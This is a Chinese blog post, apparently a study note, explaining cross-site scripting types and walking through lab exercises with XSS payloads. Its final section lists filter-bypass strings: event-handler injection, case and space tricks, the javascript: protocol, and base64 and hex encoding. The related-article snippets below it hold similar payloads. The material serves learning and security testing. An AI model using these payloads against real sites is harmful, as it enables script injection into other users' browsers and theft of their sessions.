跨站脚本攻击xss

最新推荐文章于 2024-07-30 09:06:59 发布
最新推荐文章于 2024-07-30 09:06:59 发布
阅读量226 收藏
点赞数 1
文章标签: html 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120384112
版权

#跨站脚本攻击 xss


靶机
实验地址

认识xss

概述
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。
跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。

原理
HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞。

xss类型

类型解释
反射型xss非持久型, 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一次性,所见即所得,一般容易出现在搜索页面。
存储型xss持久型, 代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
DOM型基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。

xss实验测试

1.反射型xss(get)

输入<script>alert('123')</script>,maxlength="20"限制了输入长度,故可改为100再输入
在这里插入图片描述
弹窗后将不在出现
在这里插入图片描述
2.存储型xss

输入<script>alert(document.domain);</script>后弹框,已经存储在服务器里,之后再次点击会促发xss弹框
在这里插入图片描述在这里插入图片描述
3.DOM型xss

分析代码,可看出参数传给了客户端javascript的doomxss函数执行,没有经过服务端
在这里插入图片描述

在这里插入图片描述

输入123,查看123在html的位置,发现在a标签里,尝试添加事件如onmouseover,先将前面引号闭合再输入’ onmouseover="alert('123')"

在这里插入图片描述鼠标移动指向what do you see? 促发事件onmouseover弹框
在这里插入图片描述
4.xss之 htmlspecialchars

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
’ (单引号)成为 ’
< (小于)成为 <
> (大于)成为 >
故可以利用伪协议javascript:alert(document.domain); 绕过过滤,再点击javascript:alert(document.domain);弹框在这里插入图片描述
5.xss之js输入

输入123查看在html的哪个位置,123在中,可尝试闭合<script>在这里插入图片描述故输入</script><script>alert('123')</script>闭合之后弹框
在这里插入图片描述
在这里插入图片描述

xss绕过过滤

a.闭合标签,增加事件等
"></a><scrip>alert('123')</script>
onmouseover="alert('123')"

b.空格绕过字符串替换,大小写
"><a href="javas cript:alert(document.domain)">xss</a>
' "><sCripT>alert(63252)</sCrIpT>

c.编码绕过
base64加密 "><script>eval(atob('base64加密过后的'));</script>
unicode编码 \u003c \u003e 分别为 <>
hex编码 <scrip>alert('123')</script>%3C%73%63%72%69%70%3E%61%6C%65%72%74%28%27%31%32%33%27%29%3C%2F%73%63%72%69%70%74%3E

d.存在htmlspecialchars()和htmllentities()等 实体输出函数
' onmouseover='javascript:alert(document.domain)'

在此欢迎大家指正,补充(学习笔记)

F。N 嘿嘿
关注
跨站脚本攻击XSS案例及其解决方案
若华‘的博客
01-03 7158
跨站脚本攻击XSS 目录 案例一:留言板的XSS攻击 利用xss窃取用户名密码 案例二:输入框的XSS攻击 怎么预防 服务端可以干的事 客户端可以干的事 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 案例一...
跨站脚本攻击XSS
qq_45557130的博客
10-16 1450
xss
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。这篇文章主要给大家介绍了关于跨站脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
存储型XSS(Cross-Site Scripting)
最新发布
qq_69100706的博客
07-30 255
在CTF(Capture The Flag)竞赛中,存储型XSS(Cross-Site Scripting)攻击是一种利用Web应用程序将恶意脚本永久存储在服务器上的漏洞。不同于反射型XSS,存储型XSS不需要用户点击特定的链接来激活恶意脚本,因为它存储在服务器的数据库或文件系统中,并在每次请求相关的页面或数据时执行。
XSS跨站脚本攻击靶机实操
weixin_46411728的博客
08-05 384
XSS跨站脚本攻击靶机实操 1.反射性一般原理:低级 第一步:黑客将js脚本输入存在XSS漏洞的服务器中 第二步:服务器将执行js脚本并返回弹窗给黑客 第三步:黑客将含有弹窗的url发送给用户 第四步:用户利用url访问服务器 第五步:服务器继续将含有弹窗的回包返回给用户 最终造成跨站脚本攻击XSS) 2.实验操作 服务器:dvwa 黑客:物理机用户 用户:windows xp虚拟机 对应第一步 输入: 对应第二步 第三步:将含有弹窗的URL发送给用户 第四步:访问 第五步:访问后,发现也有弹窗 输入
跨站脚本攻击XSS
秋水的博客
09-04 3628
xss原理 什么是xss? 个人理解:xss全称跨站脚本攻击,也是一种注入,可以叫HTML注入,而注入的本质是什么,就是用户输入的数据可以被当作代码来执行。 与SQL注入一样,xss的条件也是两个: 第一,参数可控 第二,输入的参数可以被拼接到源代码中执行 那么,xss需要我偶们拼接什么呢? SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是...
xss总结
weixin_44089266的博客
05-31 372
xss简单介绍 xss全名为cross-site scripting 译为跨站脚本,由于与 css 层叠样式表重名,故为了与css区分,命名为xssxss是发生在前段浏览器的漏洞,所以其影响对象为用户。 分享一些xss平台,可以供读者练习在线xss练习1,在线xss练习2 1.反射型xss 反射型xss,顾名思义也就是需要web服务器来充当反射者的角色,hacker在发现某网站存在该漏洞后通过在网页注入恶意代码,然后将带有恶意代码的网页发送给用户,之后诱导用户访问该页面,当用户访问一个带有XSS代码的UR
XSS攻击
cxyzupup的博客
01-20 2583
XSS攻击 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录XSS攻击前言一、XSS分类1. 反射型XSS:2. 存储型XSS:3. DOM型XSS:二、XSS盗取Cookie1. cookie介绍:2. 利用反射型xss盗取cookie:三、XSS篡改网页链接1. XSS篡改网页链接:2. 代码分析:3. 利用反射型xss篡改网页链接:四、使用beef
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6076
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
A3 跨站脚本攻击 XSS
发哥微课堂
04-19 555
0x00:审计介绍 对于跨站问题也就是我们常说的存储、反射和 DOM 三种,在挖掘 XSS 上我们一般的思路是查找可能在页面上进行输出的变量,并检查这些变量是否可控,然后跟踪传递过程,查看后端处理是否对接收的内容进行过滤或编码,在前端显示时是否被 htmlencode 之类的函数做过处理。 对于很多系统,不建议过滤特殊字符,一个体验不佳再一个有些系统是有需求可以输入特殊符号的,这时后台可以进行...
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
跨站脚本攻击XSS)概述】 XSS,全称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
漏洞篇(XSS跨站脚本攻击二)
m0_58001548的博客
04-16 747
页面中存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1653
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
Web安全之XSS漏洞详解
hack0919的博客
04-17 1579
常见的XSS漏洞危害有:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等
32个触发事件XSS语句的总结
weixin_33788244的博客
01-26 461
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...
xss初了解
lowerxiaoshen的博客
10-30 644
1.什么是xss跨站脚本跨站脚本是一种常见出现在web应用程序中的计算机安全漏洞,是由于web应用对用户的输入过滤不足而产生的。攻击者用网站漏洞吧恶意的脚本代码(通常包括HTML代码和客户端javascript脚本)注入到网页中,当其他用户浏览这些网页是,就会执行其中的恶意代码,对受害用户可能采取cookie资料窃取,回鹘劫持,钓鱼欺骗等各种攻击。2.html常用代码的属性了解xss发起的基础就是构
onmouseover和onmouseout的烦恼
热门推荐
teresa502的专栏
12-28 1万+
一个DIV层,当鼠标移进的时候会触发onmouseover,移出的时候会触发onmouseout。   很简单的逻辑,这也是我们想要的!但随之烦恼也就来了:onmouseover并不会只在移进时才触发,onmouseout也不会只在移出时才触发!鼠标在DIV里面移动时也会可能触发onmouseover或onmouseout。   在上图中,对于’A'来说:当鼠标进入’A'(
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 4026
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
常用xss
稳而思静 慢而有为
05-18 976
简单型Xssxss就是在页面上执行你想要的js’ 带<input> 标签的型xss需要闭合参数才能进行注入。 "><script>alert(1)</script>test "><img src=! οnerrοr=“alert(/xss/)”> <a href="" οnmοuseοver=“alert(/xss/)”>xss</a> "><img src=“javascript:alert(/xss/)”
简述跨站脚本攻击XSS的工作原理
05-10
跨站脚本攻击XSS)是一种利用Web应用程序中的漏洞,将恶意脚本注入到受害者浏览器中的攻击方式。攻击者通过在目标网站中注入恶意脚本,使得用户在浏览网站时执行该脚本,从而达到攻击目的。 XSS攻击的工作原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值